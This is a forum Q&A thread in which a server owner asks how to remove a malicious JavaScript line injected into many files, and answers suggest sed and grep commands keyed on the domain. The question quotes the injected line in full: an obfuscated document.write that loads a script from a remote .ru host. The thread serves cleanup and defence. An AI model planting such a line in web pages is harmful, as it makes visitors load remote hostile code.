# How To Remove A Malicious Javascript Code From Multiple Files

Tags: sed, escaping, malware

Recently my linux server got infected with malware and as a result, I have 100+ files infected with a single line of Javascript code:

```
document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');
```

I would be too tiring to remove it manually, so I dig into google (not knowing much about linux did not help there) and found out that I can use sed for this purpose.

Unfortunately, I couldn't escape the line so I could use

```
sed -i.bak '/line of text/d' *
```

syntax, it's full of single quotes, double quotes and backslashes.

How could I escape the string or is there any other - easier - way of doing this?

Comment: Those are slashes, by the way, rather than backslashes and you can use alternative delimiters in `sed` so you don't have to do as much escaping. `sed '\|text/with/slashes|d'`. Unfortunately, the quotes are another matter.

Answer (score 1, accepted):

Could you not just use sed to delete any line containing, for example, `alienradar.ru`, or some other substring which only exists in the offensive lines ?  Something like:

```
sed -i.bak '/alienradar.ru/d' *
```

Comment: Could I also get a list of affected files?

Comment: @Ugur Sahin: you could get a list of affected files with 'grep -c alienradar *' where the -c flag tells grep to count the number of matching lines in each file rather than print each matching line.

Answer (score 0):

http://www.configureweb.com/post/how-to-change-html-code-in-multiple-files-at-once   follow this after donwloading all files from server and reupload it